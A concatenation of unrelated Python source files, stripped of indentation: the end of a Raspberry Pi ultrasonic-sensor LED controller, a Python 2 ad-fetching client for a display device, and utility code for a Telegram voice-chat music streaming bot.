TimeElapsed2 = StopTime2 - StartTime2
# multiply with the sonic speed (34300 cm/s)
# and divide by 2, because there and back
distance2 = (TimeElapsed2 * 34300) / 2
list2.nextValue(distance2)
if(list2.avg()<100):
eventLong.set()
else:
eventLong.clear()
##############
# set Trigger to HIGH
GPIO.output(GPIO_Trigger, True)
# set Trigger after 0.01ms to LOW
time.sleep(0.00001)
GPIO.output(GPIO_Trigger, False)
StartTime = time.time()
StopTime = time.time()
# save StartTime
while GPIO.input(GPIO_Echo) == 0:
StartTime = time.time()
# save time of arrival
while GPIO.input(GPIO_Echo) == 1:
StopTime = time.time()
# time difference between start and arrival
TimeElapsed = StopTime - StartTime
# multiply with the sonic speed (34300 cm/s)
# and divide by 2, because there and back
distance = (TimeElapsed * 34300) / 2
list1.nextValue(distance)
if (list1.avg() < 100):
eventShort.set()
else:
eventShort.clear()
time.sleep(0.01)
except (RuntimeError, KeyboardInterrupt) as e:
print("watek padl zamkniety dostep do GPIO")
print('blad: ',str(e))
GPIO.cleanup() # reset all GPIO
if __name__ == '__main__':
TIME_FOR_LIGHT_Sec = 10
TIME_FOR_SILENCE_Sec = 5
parser = argparse.ArgumentParser()
parser.add_argument('-c', '--clear', action='store_true', help='clear the display on exit')
args = parser.parse_args()
# Create NeoPixel object with appropriate configuration.
strip = Adafruit_NeoPixel(LED_COUNT, LED_PIN, LED_FREQ_HZ, LED_DMA, LED_INVERT, LED_BRIGHTNESS, LED_CHANNEL)
# Intialize the library (must be called once before other functions).
strip.begin()
print('Press Ctrl-C to quit.')
if not args.clear:
print('Use "-c" argument to clear LEDs on exit')
try:
thread_safe = False
is_blinding = False
timeStart = time.time()
eventLong = multiprocessing.Event()
eventShort = multiprocessing.Event()
p = multiprocessing.Process(target=distanceProcess, args=(38, 37, 16, 15, eventLong, eventShort, 1000, 100, 100,))
p.start()
while True:
stateLong =eventLong.is_set()
stateShort = eventShort.is_set()
shortLed = Thread(target=processData, args=(strip, Color(255, 120, 33), 40, False, thread_safe, mutex))
if stateShort and not is_blinding:
colorWipeLumen(strip, 10)
shortLed.start()
is_blinding = True
timeStart = time.time()
if shortLed.is_alive():
print("Wątek sonic żyje")
time.sleep(1)
else:
print("Wątek sonic leży")
elif stateShort and is_blinding and (time.time() - timeStart > TIME_FOR_SILENCE_Sec):
time.sleep(0.5)
timeStart = time.time()
shortLed.start()
##long
longLed = Thread(target=processData, args=(strip, Color(255, 120, 133), 40, True, thread_safe, mutex))
if (stateLong) and not is_blinding:
colorWipeLumen(strip, 10)
longLed.start()
is_blinding = True
timeStart = time.time()
if longLed.is_alive():
print("Wątek ir żyje")
time.sleep(1)
else:
print("Wątek ir leży")
elif (stateLong) and is_blinding and (time.time() - timeStart > TIME_FOR_SILENCE_Sec):
timeStart = time.time()
if longLed.is_alive():
time.sleep(0.5)
else:
longLed = Thread(target=processData, args=(strip, Color(255, 120, 133), 40, True, thread_safe, mutex))
longLed.start()
is_blinding = True
print("przed wylączaniem")
if is_blinding & ((time.time() - timeStart) > TIME_FOR_LIGHT_Sec):
if longLed.is_alive() or shortLed.is_alive():
print("zaczekam az czas sie skonczy")
time.sleep(0.1)
elif (time.time() - timeStart) > TIME_FOR_LIGHT_Sec & is_blinding:
print("Czas sie skonczył wyłączam")
print((time.time() - timeStart) > TIME_FOR_LIGHT_Sec & is_blinding)
print((time.time() - timeStart))
colorWipeDimming(strip, 15)
is_blinding = False
time.sleep(0.4)
except (RuntimeError, KeyboardInterrupt):
print('Exception')
time.sleep(1000.0 / 1000.0)
if longLed.is_alive():
longLed.join()
if shortLed.is_alive():
shortLed.join()
t3 = Thread(target=processData, args=(strip, Color(0, 0, 0), 0.005, True, thread_safe, mutex))
t3.start()
finally:
#GPIO.cleanup() # reset all GPIO
print("Program ended")
|
ad_service.py
|
#!/usr/bin/python
from collections import deque
import time
from ad_req_interface import AdReqInterface
import urllib2, urllib
import threading
import uuid
import os
import json
class HttpReq(object):
def __init__(self, type, url="http://xssp.maxbit.cn/adapi/ad/getAd"):
self.__MAX_TIMES = 2
self.__REQ_INTERVAL = 2
self.__last_req_ts = 0
self.__req_times = 0
self.__type = type
self.__timeout = 1
self.__url = url
self.__req_done = False
self._app_id = '500098'
self._pic_slot = '100055'
self._video_slot = ''
self._ad_time = '10'
self._dev_id = ''
self._api_ver = '1.5'
def _set_req_done(self):
print '_set_req_done() _req_done = True'
self.__req_done = True
def set_max_times(self, t):
self.__MAX_TIMES =t
def set_req_interval(self, i):
self.__REQ_INTERVAL = i
def __update_last_req_ts(self):
self.__last_req_ts = int(time.time())
def __update_req_times(self):
self.__req_times += 1
def __update_request_counter(self):
self.__update_last_req_ts()
self.__update_req_times()
def set_req_timeout(self, to):
self.__timeout = to
def get_req_timeout(self):
return self.__timeout
""" whether req node need re-add to queue """
def need_redo(self):
if self.__req_done:
return False
if self.__req_times >= self.__MAX_TIMES:
return False
return True
def get_type(self):
return self.__type
def get_url(self):
return self.__url
def _do_request(self):
raise Exception("this is method should override by subclass")
def exec_http_req(self):
''' compare req interval '''
cur_ts = int(time.time())
dts = cur_ts - self.__last_req_ts
if dts <= self.__REQ_INTERVAL:
return None
ret = self._do_request()
self.__update_request_counter()
return ret
class AdInfo(object):
def __init__(self):
self.__ad_url = None
self.__ad_width = None
self.__ad_height = None
self.__ad_cb_list = []
self.__ad_type = None
self.__ad_media_name = None
self.__create_time = int(time.time())
self.__VALID_INTERVAL = 60
def set_ad_url(self, u):
self.__ad_url = u
if not u:
return
if len(u) <= 4:
return
index = u.rfind('/')
if index < 0:
return
name = u[index + 1:len(u)]
self.__ad_media_name = os.path.join('/tmp/daily/index/08/pb/data/',str(name))
def set_ad_type(self, t):
self.__ad_type = t
def get_ad_type(self):
return self.__ad_type
def set_ad_cb_add(self, l):
self.__ad_cb_list.append(l)
def get_ad_url(self):
return self.__ad_url
def get_ad_cb_list(self):
return self.__ad_cb_list
def get_ad_media_name(self):
return self.__ad_media_name
def valid(self):
""" file doesn't exist - invalid """
if not os.path.exists(self.__ad_media_name):
print 'ad_service, file:%s' % self.__ad_media_name, ' does not exist'
return False
""" difficult time > 60s - invalid """
ct = int(time.time())
dt = ct - self.__create_time
if dt > self.__VALID_INTERVAL:
return False
return True
class AdRequest(HttpReq):
def __init__(self, dev_id, city_id, type='pic'):
super(AdRequest, self).__init__(type='REQUEST')
self.__type = type
self.__dev_id = dev_id
self.__city_id = city_id
self.__params = {}
self.__params['id'] = str(uuid.uuid4())
self.__params['app_id'] = self._app_id
self.__params['adslot_id'] = self._pic_slot
self.__params['api_version'] = self._api_ver
self.__params['ad_time'] = self._ad_time
self.__params['device'] = self.__generate_dev_info()
self.__params['gps'] = self.__generate_gps_info()
self.__params['network'] = self.__generate_network_info()
self.__params['media'] = self.__generate_media_info()
def __generate_media_info(self):
media={}
media['channel'] = 'None'
media['tags'] = 'None'
return media
def __generate_gps_info(self):
gps={}
gps['lon'] = float(0.0)
gps['lat'] = float(0.0)
gps['timestamp'] = long(time.time())
gps['city_code'] = int(self.__city_id)
return gps
def __generate_network_info(self):
network = {}
network['connection_type'] = 'UNKNOWN_NETWORK'
network['operator_type'] = 'ISP_UNKNOWN'
network['ipv4'] = '192.168.0.1'
return network
def __generate_dev_info(self):
device = {}
device['device_id'] = self.__dev_id
device['vendor'] = 'rmrb'
device['model'] = '2s'
device['screen_width'] = int(768)
device['screen_height'] = int(1330)
device['os_type'] = 'UNKNOWN'
device['os_version'] = '11.04'
return device
def _parse_json(self, js):
response = AdInfo()
while True:
try:
retJs = json.loads(js)
# retJs = json.dumps(js)
dataJs = retJs['data']
dataList = list(dataJs)
lSize = len(dataList)
dataJs = dataList[0]
mediaUrl = dataJs['ad_url']
response.set_ad_url(mediaUrl)
mediaType = dataJs['ad_type']
response.set_ad_type(mediaType)
except Exception, e:
print ' _parse_son, excp:%s' % e.message
try:
cb_url = dataJs['callback_url']
for l in cb_url:
response.set_ad_cb_add(l)
except Exception, e:
print ' _parse_json callback_url, excp:%s' % e.message
try:
cb_url = dataJs['third_monitor_url']
for l in cb_url:
response.set_ad_cb_add(l)
except Exception, e1:
print ' _parse_json third_monitor_url, excp:%s' % e1.message
break
return response
def _do_request(self):
import json
ad_info = None
jsObj = json.dumps(self.__params)
# print 'adrequest json:%s' % jsObj
con = None
res = None
# print 'req json:%s' % jsObj
try:
req = urllib2.Request(self.get_url(), jsObj.decode('utf8'), {'Content-Type': 'application/json'})
con = urllib2.urlopen(req)
res = con.read()
except urllib2.HTTPError, e:
print ' req excp:', e.message
if con and con.code == 200 and res and len(res) > 0:
print " success to request ad, response:\n>>>>\n%s<<<<<" % res
ad_info = self._parse_json(res)
if ad_info:
self._set_req_done()
else:
print " failed to request ad, err code:%s\n" % con.code
return ad_info
class AdCallback(HttpReq):
def __init__(self, url):
super(AdCallback, self).__init__('RESPONSE', url)
def _do_request(self):
print 'Am AdCallback._do_request(). '
try:
url = self.get_url()
con = urllib2.urlopen(url)
if con and con.code == 200:
self._set_req_done()
except urllib2.HTTPError, e:
print ' req excp:', e.message
return None
class AdServer(AdReqInterface):
def __init__(self):
""" work queue, write to left, read from right"""
self.__work_queue = deque()
""" ad result, write to left, read from right"""
self.__ad_pic_queue = deque()
self.__work_queue_lock = threading.Condition()
self.__dev_id = None
self.__city_id = None
self.detect_id()
def detect_id(self):
f_path = '/tmp/daily/index/id.ini'
if os.path.exists(f_path):
f = open(f_path, 'r')
id = f.readline()
id = id.replace('\n', '')
self.__dev_id = id
""""shanghai huang-pu"""
self.__city_id = "310101"
def __add_pic(self, n):
self.__ad_pic_queue.appendleft(n)
def __get_pic(self):
if len(self.__ad_pic_queue) == 0:
return None
else:
return self.__ad_pic_queue.pop()
def __add_req(self, n):
if not self.__work_queue_lock.acquire(False):
print ' AdServer =.__add_req failed to obtain mutex lock'
return
if isinstance(n, HttpReq):
self.__work_queue.appendleft(n)
self.__work_queue_lock.notify(1)
self.__work_queue_lock.release()
def __get_req(self):
if len(self.__work_queue) == 0:
return None
else:
return self.__work_queue.pop()
def obtain_picture(self):
path = None
while len(self.__ad_pic_queue) > 0:
adObj = self.__ad_pic_queue.pop()
if not adObj.valid():
continue
""" add ad callback to work queue """
cb_list = adObj.get_ad_cb_list()
for url in cb_list:
cb = AdCallback(url)
self.__add_req(cb)
path = adObj.get_ad_media_name()
break
""" return ad picture name usually md5value of pic """
return path
def obtain_video(self):
pass
def load_picture(self):
""" create a new adRequest obj, add to work queue"""
n = AdRequest(self.__dev_id, self.__city_id, 'pic')
self.__add_req(n)
def load_video(self):
""" create a new adRequest obj, add to work queue"""
# n = AdRequest("http://pricloud.cn", 'video')
# self.__add_req(n)
pass
def exec_loop(self):
while True:
try:
self.__work_queue_lock.acquire(True)
while len(self.__work_queue) == 0:
print 'queue empty, wait here'
self.__work_queue_lock.wait(3)
self.__work_queue_lock.release()
ele = self.__get_req()
if not isinstance(ele, HttpReq):
continue
m_info = ele.exec_http_req()
if m_info and isinstance(m_info, AdInfo):
if 'IMAGE' in m_info.get_ad_type():
self.__add_pic(m_info)
if ele.need_redo():
self.__add_req(ele)
except Exception, e:
print ' AdServer.exec_loop() excp: ', e.message
time.sleep(.05)
def run_ad_service():
ad_server = AdServer()
threading.Thread(target=ad_server.exec_loop).start()
return ad_server
""" test """
def test():
ad_server = run_ad_service()
while True:
print 'call load_picture()'
ad_server.load_picture()
time.sleep(5)
print 'call obtain_picture()'
name = ad_server.obtain_picture()
print 'obtain picture name:%s' % name
time.sleep(30)
#test()
|
utils.py
|
from logger import LOGGER
try:
from pyrogram.raw.types import InputChannel
from wrapt_timeout_decorator import timeout
from apscheduler.schedulers.asyncio import AsyncIOScheduler
from apscheduler.jobstores.mongodb import MongoDBJobStore
from apscheduler.jobstores.base import ConflictingIdError
from pyrogram.raw.functions.channels import GetFullChannel
from pytgcalls import StreamType
from youtube_dl import YoutubeDL
from pyrogram import filters
from pymongo import MongoClient
from datetime import datetime
from threading import Thread
from config import Config
from asyncio import sleep
from bot import bot
import subprocess
import asyncio
import random
import re
import ffmpeg
import json
import time
import sys
import os
import math
from pyrogram.errors.exceptions.bad_request_400 import (
BadRequest,
ScheduleDateInvalid
)
from pytgcalls.types.input_stream import (
AudioVideoPiped,
AudioPiped,
AudioImagePiped
)
from pytgcalls.types.input_stream import (
AudioParameters,
VideoParameters
)
from pyrogram.types import (
InlineKeyboardButton,
InlineKeyboardMarkup,
Message
)
from pyrogram.raw.functions.phone import (
EditGroupCallTitle,
CreateGroupCall,
ToggleGroupCallRecord,
StartScheduledGroupCall
)
from pytgcalls.exceptions import (
GroupCallNotFound,
NoActiveGroupCall,
InvalidVideoProportion
)
from PIL import (
Image,
ImageFont,
ImageDraw
)
from user import (
group_call,
USER
)
except ModuleNotFoundError:
import os
import sys
import subprocess
file=os.path.abspath("requirements.txt")
subprocess.check_call([sys.executable, '-m', 'pip', 'install', '-r', file, '--upgrade'])
os.execl(sys.executable, sys.executable, *sys.argv)
if Config.DATABASE_URI:
from database import db
monclient = MongoClient(Config.DATABASE_URI)
jobstores = {
'default': MongoDBJobStore(client=monclient, database=Config.DATABASE_NAME, collection='scheduler')
}
scheduler = AsyncIOScheduler(jobstores=jobstores)
else:
scheduler = AsyncIOScheduler()
scheduler.start()
async def play():
song=Config.playlist[0]
if song[3] == "telegram":
file=Config.GET_FILE.get(song[5])
if not file:
await download(song)
while not file:
await sleep(1)
file=Config.GET_FILE.get(song[5])
LOGGER.info("Downloading the file from TG")
while not os.path.exists(file):
await sleep(1)
elif song[3] == "url":
file=song[2]
else:
file=await get_link(song[2])
if not file:
if Config.playlist or Config.STREAM_LINK:
return await skip()
else:
LOGGER.error("This stream is not supported , leaving VC.")
return False
link, seek, pic, width, height = await chek_the_media(file, title=f"{song[1]}")
if not link:
LOGGER.warning("Unsupported link, Skiping from queue.")
return
await sleep(1)
if Config.STREAM_LINK:
Config.STREAM_LINK=False
await join_call(link, seek, pic, width, height)
async def schedule_a_play(job_id, date):
try:
scheduler.add_job(run_schedule, "date", [job_id], id=job_id, run_date=date, max_instances=50, misfire_grace_time=None)
except ConflictingIdError:
LOGGER.warning("This already scheduled")
return
if not Config.CALL_STATUS or not Config.IS_ACTIVE:
if Config.SCHEDULE_LIST[0]['job_id'] == job_id \
and (date - datetime.now()).total_seconds() < 86400:
song=Config.SCHEDULED_STREAM.get(job_id)
if Config.IS_RECORDING:
scheduler.add_job(start_record_stream, "date", id=str(Config.CHAT), run_date=date, max_instances=50, misfire_grace_time=None)
try:
await USER.send(CreateGroupCall(
peer=(await USER.resolve_peer(Config.CHAT)),
random_id=random.randint(10000, 999999999),
schedule_date=int(date.timestamp()),
title=song['1']
)
)
Config.HAS_SCHEDULE=True
except ScheduleDateInvalid:
LOGGER.error("Unable to schedule VideoChat, since date is invalid")
except Exception as e:
LOGGER.error(f"Error in scheduling voicechat- {e}")
await sync_to_db()
async def run_schedule(job_id):
data=Config.SCHEDULED_STREAM.get(job_id)
if not data:
LOGGER.error("The Scheduled stream was not played, since data is missing")
old=filter(lambda k: k['job_id'] == job_id, Config.SCHEDULE_LIST)
if old:
Config.SCHEDULE_LIST.remove(old)
await sync_to_db()
pass
else:
if Config.HAS_SCHEDULE:
if not await start_scheduled():
LOGGER.error("Scheduled stream skipped, Reason - Unable to start a voice chat.")
return
data_ = [{1:data['1'], 2:data['2'], 3:data['3'], 4:data['4'], 5:data['5']}]
Config.playlist = data_ + Config.playlist
await play()
LOGGER.info("Starting Scheduled Stream")
del Config.SCHEDULED_STREAM[job_id]
old=list(filter(lambda k: k['job_id'] == job_id, Config.SCHEDULE_LIST))
if old:
for old_ in old:
Config.SCHEDULE_LIST.remove(old_)
if not Config.SCHEDULE_LIST:
Config.SCHEDULED_STREAM = {} #clear the unscheduled streams
await sync_to_db()
if len(Config.playlist) <= 1:
return
await download(Config.playlist[1])
async def cancel_all_schedules():
for sch in Config.SCHEDULE_LIST:
job=sch['job_id']
k=scheduler.get_job(job, jobstore=None)
if k:
scheduler.remove_job(job, jobstore=None)
if Config.SCHEDULED_STREAM.get(job):
del Config.SCHEDULED_STREAM[job]
Config.SCHEDULE_LIST.clear()
await sync_to_db()
LOGGER.info("All the schedules are removed")
async def skip():
if Config.STREAM_LINK and len(Config.playlist) == 0 and Config.IS_LOOP:
await stream_from_link()
return
elif not Config.playlist \
and Config.IS_LOOP:
LOGGER.info("Loop Play enabled, switching to STARTUP_STREAM, since playlist is empty.")
await start_stream()
return
elif not Config.playlist \
and not Config.IS_LOOP:
LOGGER.info("Loop Play is disabled, leaving call since playlist is empty.")
await leave_call()
return
old_track = Config.playlist.pop(0)
await clear_db_playlist(song=old_track)
if old_track[3] == "telegram":
file=Config.GET_FILE.get(old_track[5])
try:
os.remove(file)
except:
pass
del Config.GET_FILE[old_track[5]]
if not Config.playlist \
and Config.IS_LOOP:
LOGGER.info("Loop Play enabled, switching to STARTUP_STREAM, since playlist is empty.")
await start_stream()
return
elif not Config.playlist \
and not Config.IS_LOOP:
LOGGER.info("Loop Play is disabled, leaving call since playlist is empty.")
await leave_call()
return
LOGGER.info(f"START PLAYING: {Config.playlist[0][1]}")
if Config.DUR.get('PAUSE'):
del Config.DUR['PAUSE']
await play()
if len(Config.playlist) <= 1:
return
await download(Config.playlist[1])
async def check_vc():
a = await bot.send(GetFullChannel(channel=(await bot.resolve_peer(Config.CHAT))))
if a.full_chat.call is None:
try:
LOGGER.info("No active calls found, creating new")
await USER.send(CreateGroupCall(
peer=(await USER.resolve_peer(Config.CHAT)),
random_id=random.randint(10000, 999999999)
)
)
if Config.WAS_RECORDING:
await start_record_stream()
await sleep(2)
return True
except Exception as e:
LOGGER.error(f"Unable to start new GroupCall :- {e}")
return False
else:
if Config.HAS_SCHEDULE:
await start_scheduled()
return True
async def join_call(link, seek, pic, width, height):
if not await check_vc():
LOGGER.error("No voice call found and was unable to create a new one. Exiting...")
return
if Config.HAS_SCHEDULE:
await start_scheduled()
if Config.CALL_STATUS:
if Config.IS_ACTIVE == False:
Config.CALL_STATUS = False
return await join_call(link, seek, pic, width, height)
play=await change_file(link, seek, pic, width, height)
else:
play=await join_and_play(link, seek, pic, width, height)
if play == False:
await sleep(1)
await join_call(link, seek, pic, width, height)
await sleep(1)
if not seek:
Config.DUR["TIME"]=time.time()
if Config.EDIT_TITLE:
await edit_title()
old=Config.GET_FILE.get("old")
if old:
for file in old:
os.remove(f"./downloads/{file}")
try:
del Config.GET_FILE["old"]
except:
LOGGER.error("Error in Deleting from dict")
pass
await send_playlist()
async def start_scheduled():
try:
await USER.send(
StartScheduledGroupCall(
call=(
await USER.send(
GetFullChannel(
channel=(
await USER.resolve_peer(
Config.CHAT
)
)
)
)
).full_chat.call
)
)
if Config.WAS_RECORDING:
await start_record_stream()
return True
except Exception as e:
if 'GROUPCALL_ALREADY_STARTED' in str(e):
LOGGER.warning("Already Groupcall Exist")
return True
else:
Config.HAS_SCHEDULE=False
return await check_vc()
async def join_and_play(link, seek, pic, width, height):
try:
if seek:
start=str(seek['start'])
end=str(seek['end'])
if not Config.IS_VIDEO:
await group_call.join_group_call(
int(Config.CHAT),
AudioPiped(
link,
audio_parameters=Config.AUDIO_Q,
additional_ffmpeg_parameters=f'-ss {start} -atend -t {end}',
),
stream_type=StreamType().pulse_stream,
)
else:
if pic:
await group_call.join_group_call(
int(Config.CHAT),
AudioImagePiped(
link,
pic,
audio_parameters=Config.AUDIO_Q,
video_parameters=Config.VIDEO_Q,
additional_ffmpeg_parameters=f'-ss {start} -atend -t {end}', ),
stream_type=StreamType().pulse_stream,
)
else:
if not width \
or not height:
LOGGER.error("No Valid Video Found and hence removed from playlist.")
if Config.playlist or Config.STREAM_LINK:
return await skip()
else:
LOGGER.error("This stream is not supported , leaving VC.")
return
if Config.BITRATE and Config.FPS:
await group_call.join_group_call(
int(Config.CHAT),
AudioVideoPiped(
link,
video_parameters=VideoParameters(
width,
height,
Config.FPS,
),
audio_parameters=AudioParameters(
Config.BITRATE
),
additional_ffmpeg_parameters=f'-ss {start} -atend -t {end}',
),
stream_type=StreamType().pulse_stream,
)
else:
await group_call.join_group_call(
int(Config.CHAT),
AudioVideoPiped(
link,
video_parameters=Config.VIDEO_Q,
audio_parameters=Config.AUDIO_Q,
additional_ffmpeg_parameters=f'-ss {start} -atend -t {end}',
),
stream_type=StreamType().pulse_stream,
)
else:
if not Config.IS_VIDEO:
await group_call.join_group_call(
int(Config.CHAT),
AudioPiped(
link,
audio_parameters=Config.AUDIO_Q,
),
stream_type=StreamType().pulse_stream,
)
else:
if pic:
await group_call.join_group_call(
int(Config.CHAT),
AudioImagePiped(
link,
pic,
video_parameters=Config.VIDEO_Q,
audio_parameters=Config.AUDIO_Q,
),
stream_type=StreamType().pulse_stream,
)
else:
if not width \
or not height:
LOGGER.error("No Valid Video Found and hence removed from playlist.")
if Config.playlist or Config.STREAM_LINK:
return await skip()
else:
LOGGER.error("This stream is not supported , leaving VC.")
return
if Config.FPS and Config.BITRATE:
await group_call.join_group_call(
int(Config.CHAT),
AudioVideoPiped(
link,
video_parameters=VideoParameters(
width,
height,
Config.FPS,
),
audio_parameters=AudioParameters(
Config.BITRATE
),
),
stream_type=StreamType().pulse_stream,
)
else:
await group_call.join_group_call(
int(Config.CHAT),
AudioVideoPiped(
link,
video_parameters=Config.VIDEO_Q,
audio_parameters=Config.AUDIO_Q
),
stream_type=StreamType().pulse_stream,
)
Config.CALL_STATUS=True
return True
except NoActiveGroupCall:
try:
LOGGER.info("No active calls found, creating new")
await USER.send(CreateGroupCall(
peer=(await USER.resolve_peer(Config.CHAT)),
random_id=random.randint(10000, 999999999)
)
)
if Config.WAS_RECORDING:
await start_record_stream()
await sleep(2)
await restart_playout()
except Exception as e:
LOGGER.error(f"Unable to start new GroupCall :- {e}")
pass
except InvalidVideoProportion:
if not Config.FPS and not Config.BITRATE:
Config.FPS=20
Config.BITRATE=48000
await join_and_play(link, seek, pic, width, height)
Config.FPS=False
Config.BITRATE=False
return True
else:
LOGGER.error("Invalid video")
if Config.playlist or Config.STREAM_LINK:
return await skip()
else:
LOGGER.error("This stream is not supported , leaving VC.")
return
except Exception as e:
LOGGER.error(f"Errors Occured while joining, retrying Error- {e}")
return False
async def change_file(link, seek, pic, width, height):
try:
if seek:
start=str(seek['start'])
end=str(seek['end'])
if not Config.IS_VIDEO:
await group_call.change_stream(
int(Config.CHAT),
AudioPiped(
link,
audio_parameters=Config.AUDIO_Q,
additional_ffmpeg_parameters=f'-ss {start} -atend -t {end}',
),
)
else:
if pic:
await group_call.change_stream(
int(Config.CHAT),
AudioImagePiped(
link,
pic,
audio_parameters=Config.AUDIO_Q,
video_parameters=Config.VIDEO_Q,
additional_ffmpeg_parameters=f'-ss {start} -atend -t {end}', ),
)
else:
if not width \
or not height:
LOGGER.error("No Valid Video Found and hence removed from playlist.")
if Config.playlist or Config.STREAM_LINK:
return await skip()
else:
LOGGER.error("This stream is not supported , leaving VC.")
return
if Config.FPS and Config.BITRATE:
await group_call.change_stream(
int(Config.CHAT),
AudioVideoPiped(
link,
video_parameters=VideoParameters(
width,
height,
Config.FPS,
),
audio_parameters=AudioParameters(
Config.BITRATE
),
additional_ffmpeg_parameters=f'-ss {start} -atend -t {end}',
),
)
else:
await group_call.change_stream(
int(Config.CHAT),
AudioVideoPiped(
link,
video_parameters=Config.VIDEO_Q,
audio_parameters=Config.AUDIO_Q,
additional_ffmpeg_parameters=f'-ss {start} -atend -t {end}',
),
)
else:
if not Config.IS_VIDEO:
await group_call.change_stream(
int(Config.CHAT),
AudioPiped(
link,
audio_parameters=Config.AUDIO_Q
),
)
else:
if pic:
await group_call.change_stream(
int(Config.CHAT),
AudioImagePiped(
link,
pic,
audio_parameters=Config.AUDIO_Q,
video_parameters=Config.VIDEO_Q,
),
)
else:
if not width \
or not height:
LOGGER.error("No Valid Video Found and hence removed from playlist.")
if Config.playlist or Config.STREAM_LINK:
return await skip()
else:
LOGGER.error("This stream is not supported , leaving VC.")
return
if Config.FPS and Config.BITRATE:
await group_call.change_stream(
int(Config.CHAT),
AudioVideoPiped(
link,
video_parameters=VideoParameters(
width,
height,
Config.FPS,
),
audio_parameters=AudioParameters(
Config.BITRATE,
),
),
)
else:
await group_call.change_stream(
int(Config.CHAT),
AudioVideoPiped(
link,
video_parameters=Config.VIDEO_Q,
audio_parameters=Config.AUDIO_Q,
),
)
except InvalidVideoProportion:
if not Config.FPS and not Config.BITRATE:
Config.FPS=20
Config.BITRATE=48000
await join_and_play(link, seek, pic, width, height)
Config.FPS=False
Config.BITRATE=False
return True
else:
LOGGER.error("Invalid video, skipped")
if Config.playlist or Config.STREAM_LINK:
return await skip()
else:
LOGGER.error("This stream is not supported , leaving VC.")
return
except Exception as e:
LOGGER.error(f"Error in joining call - {e}")
return False
async def seek_file(seektime):
play_start=int(float(Config.DUR.get('TIME')))
if not play_start:
return False, "Player not yet started"
else:
data=Config.DATA.get("FILE_DATA")
if not data:
return False, "No Streams for seeking"
played=int(float(time.time())) - int(float(play_start))
if data.get("dur", 0) == 0:
return False, "Seems like live stream is playing, which cannot be seeked."
total=int(float(data.get("dur", 0)))
trimend = total - played - int(seektime)
trimstart = played + int(seektime)
if trimstart > total:
return False, "Seeked duration exceeds maximum duration of file"
new_play_start=int(play_start) - int(seektime)
Config.DUR['TIME']=new_play_start
link, seek, pic, width, height = await chek_the_media(data.get("file"), seek={"start":trimstart, "end":trimend})
await join_call(link, seek, pic, width, height)
return True, None
async def leave_call():
try:
await group_call.leave_group_call(Config.CHAT)
except Exception as e:
LOGGER.error(f"Errors while leaving call {e}")
#Config.playlist.clear()
if Config.STREAM_LINK:
Config.STREAM_LINK=False
Config.CALL_STATUS=False
if Config.SCHEDULE_LIST:
sch=Config.SCHEDULE_LIST[0]
if (sch['date'] - datetime.now()).total_seconds() < 86400:
song=Config.SCHEDULED_STREAM.get(sch['job_id'])
if Config.IS_RECORDING:
k=scheduler.get_job(str(Config.CHAT), jobstore=None)
if k:
scheduler.remove_job(str(Config.CHAT), jobstore=None)
scheduler.add_job(start_record_stream, "date", id=str(Config.CHAT), run_date=sch['date'], max_instances=50, misfire_grace_time=None)
try:
await USER.send(CreateGroupCall(
peer=(await USER.resolve_peer(Config.CHAT)),
random_id=random.randint(10000, 999999999),
schedule_date=int((sch['date']).timestamp()),
title=song['1']
)
)
Config.HAS_SCHEDULE=True
except ScheduleDateInvalid:
LOGGER.error("Unable to schedule VideoChat, since date is invalid")
except Exception as e:
LOGGER.error(f"Error in scheduling voicechat- {e}")
await sync_to_db()
async def restart():
try:
await group_call.leave_group_call(Config.CHAT)
await sleep(2)
except Exception as e:
LOGGER.error(e)
if not Config.playlist:
await start_stream()
return
LOGGER.info(f"- START PLAYING: {Config.playlist[0][1]}")
await sleep(2)
await play()
LOGGER.info("Restarting Playout")
if len(Config.playlist) <= 1:
return
await download(Config.playlist[1])
async def restart_playout():
if not Config.playlist:
await start_stream()
return
LOGGER.info(f"RESTART PLAYING: {Config.playlist[0][1]}")
data=Config.DATA.get('FILE_DATA')
if data:
link, seek, pic, width, height = await chek_the_media(data['file'], title=f"{Config.playlist[0][1]}")
if not link:
LOGGER.warning("Unsupported Link")
return
await sleep(1)
if Config.STREAM_LINK:
Config.STREAM_LINK=False
await join_call(link, seek, pic, width, height)
else:
await play()
if len(Config.playlist) <= 1:
return
await download(Config.playlist[1])
async def set_up_startup():
regex = r"^(?:https?:\/\/)?(?:www\.)?youtu\.?be(?:\.com)?\/?.*(?:watch|embed)?(?:.*v=|v\/|\/)([\w\-_]+)\&?"
match = re.match(regex, Config.STREAM_URL)
if match:
Config.YSTREAM=True
LOGGER.info("YouTube Stream is set as STARTUP STREAM")
elif Config.STREAM_URL.startswith("https://t.me/DumpPlaylist"):
try:
msg_id=Config.STREAM_URL.split("/", 4)[4]
Config.STREAM_URL=int(msg_id)
Config.YPLAY=True
LOGGER.info("YouTube Playlist is set as STARTUP STREAM")
except:
Config.STREAM_URL="http://j78dp346yq5r-hls-live.5centscdn.com/safari/live.stream/playlist.m3u8"
LOGGER.error("Unable to fetch youtube playlist, starting Safari TV")
pass
else:
Config.STREAM_URL=Config.STREAM_URL
Config.STREAM_SETUP=True
async def start_stream():
if not Config.STREAM_SETUP:
await set_up_startup()
if Config.YPLAY:
await y_play(Config.STREAM_URL)
return
if Config.YSTREAM:
link=await get_link(Config.STREAM_URL)
else:
link=Config.STREAM_URL
link, seek, pic, width, height = await chek_the_media(link, title="Startup Stream")
if not link:
LOGGER.warning("Unsupported link")
return False
if Config.IS_VIDEO:
if not ((width and height) or pic):
LOGGER.error("Stream Link is invalid")
return
#if Config.playlist:
#Config.playlist.clear()
await join_call(link, seek, pic, width, height)
async def stream_from_link(link):
link, seek, pic, width, height = await chek_the_media(link)
if not link:
LOGGER.error("Unable to obtain sufficient information from the given url")
return False, "Unable to obtain sufficient information from the given url"
#if Config.playlist:
#Config.playlist.clear()
Config.STREAM_LINK=link
await join_call(link, seek, pic, width, height)
return True, None
async def get_link(file):
def_ydl_opts = {'quiet': True, 'prefer_insecure': False, "geo-bypass": True}
with YoutubeDL(def_ydl_opts) as ydl:
try:
ydl_info = ydl.extract_info(file, download=False)
except Exception as e:
LOGGER.error(f"Errors occured while getting link from youtube video {e}")
if Config.playlist or Config.STREAM_LINK:
return await skip()
else:
LOGGER.error("This stream is not supported , leaving VC.")
return False
url=None
for each in ydl_info['formats']:
if each['width'] == 640 \
and each['acodec'] != 'none' \
and each['vcodec'] != 'none':
url=each['url']
break #prefer 640x360
elif each['width'] \
and each['width'] <= 1280 \
and each['acodec'] != 'none' \
and each['vcodec'] != 'none':
url=each['url']
continue # any other format less than 1280
else:
continue
if url:
return url
else:
